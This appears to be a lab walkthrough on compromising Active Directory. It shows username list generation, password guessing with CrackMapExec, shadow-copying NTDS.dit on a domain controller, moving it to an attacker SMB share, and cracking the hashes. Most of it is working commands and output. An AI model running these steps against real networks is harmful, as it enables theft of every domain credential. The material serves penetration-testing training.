Attacking Active Directory And NTDS

Once a Windows system is joined to a domain, it no longer validates logon requests against its local SAM database by default. The domain-joined system forwards authentication requests to a domain controller instead.


Dictionary Attacks against AD accounts using CrackMapExec

Dictionary attacks are noisy, and they can be stopped by the account lockout threshold enforced through Group Policy: too many failed attempts and the account is locked.

Spraying Usernames

Tailor the username list to the target whenever possible: search social media, look at the employee directory, and look at the format of known email addresses.

Common username conventions:

Username Convention                    Practical Example for Jane Jill Doe
firstinitiallastname                   jdoe
firstinitialmiddleinitiallastname      jjdoe
firstnamelastname                      janedoe
firstname.lastname                     jane.doe
lastname.firstname                     doe.jane
nickname                               doedoehacksstuff
Find the email structure by googling the domain name ("@inlanefreight.com"), scrape social media sites, and mash the names up into potential valid usernames. Some organizations obfuscate usernames to prevent spraying. Google dorks such as "inlanefreight.com filetype:pdf" can surface documents whose PDF properties still contain usernames if they were generated with a tool that embeds the author.

Create a custom list of usernames

> cat usernames.txt 
bwilliamson
benwilliamson
ben.willamson
willamson.ben
bburgerstien
bobburgerstien
bob.burgerstien
burgerstien.bob
jstevenson
jimstevenson
jim.stevenson
stevenson.jim

Or use an automated list generator such as Username Anarchy:

> ./username-anarchy -i /home/ltnbob/names.txt

ben
benwilliamson
ben.williamson
benwilli
benwill
benw
b.williamson
bwilliamson
wben
w.ben
williamsonb
williamson
williamson.b
williamson.ben
bw
...

Launching the Attack with CrackMapExec

crackmapexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt

On any Windows operating system, an admin can open Event Viewer and view the Security log to see the exact actions that were logged. This attack is noisy: every failed logon attempt leaves a Security event, so a dictionary run against one account stands out immediately.

Once we have discovered some credentials, we could proceed to try to gain remote access to the target domain controller and capture the NTDS.dit file.

NTDS.dit after we have some credentials

  • NT Directory Services (NTDS) is the directory service used with Active Directory
  • NTDS.dit is stored in %SystemRoot%\NTDS on every domain controller in the forest
  • .dit stands for directory information tree
  • it is the primary database file associated with AD
  • it stores all domain usernames, password hashes, and other critical schema information
  • Capture this file -> every account in the domain is compromised

Connect to the Domain Controller with EvilWinRM

evil-winrm -i 10.129.201.57  -u bwilliamson -p 'P@55w0rd!'

Check local group membership

Accessing NTDS.dit requires local admin rights on the domain controller (Administrators group) or Domain Admin (Domain Admins group) or equivalent rights.

*Evil-WinRM* PS C:\> net localgroup

Aliases for \\DC01

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators

Check domain admin privileges

*Evil-WinRM* PS C:\> net user bwilliamson

User name                    bwilliamson
Full Name                    Ben Williamson
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/13/2022 12:48:58 PM
Password expires             Never
Password changeable          1/14/2022 12:48:58 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/14/2022 2:07:49 PM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Domain Admins
The command completed successfully.

This account has both Administrators and Domain Admins rights, which means we can do just about anything we want, including making a copy of the NTDS.dit file.

Create a Shadow Copy of C:

NTDS.dit is most likely on C:, which is the default. We use vssadmin to create a Volume Shadow Copy. This is very useful because NTDS.dit is actively read and written while AD runs, and the shadow copy lets us copy it without bringing the application or system down.

*Evil-WinRM* PS C:\> vssadmin CREATE SHADOW /For=C:

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {186d5979-2f2b-4afe-8101-9f1111e4cb1a}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2

Copy NTDS.dit from C:

*Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

        1 file(s) copied.

Transfer NTDS to Attack Host

Host an SMB share on the attack host, as seen in Windows File Transfer and Attacking SAM, and move the file to it:

*Evil-WinRM* PS C:\NTDS> cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\CompData

        1 file(s) moved.

Alternate Fast Method: CrackMapExec

A fast and convenient way of getting NTDS.dit is the --ntds flag, which dumps the hashes directly (quote the password so the shell does not expand the "!"):

crackmapexec smb 10.129.201.57 -u bwilliamson -p 'P@55w0rd!' --ntds

Crack the NT Hash

sudo hashcat -m 1000 92fd67fd2f49d0e83744aa82363f021b /usr/share/wordlists/rockyou.txt

If the hash cannot be cracked, try Pass-the-Hash (PtH) with the NT hash directly.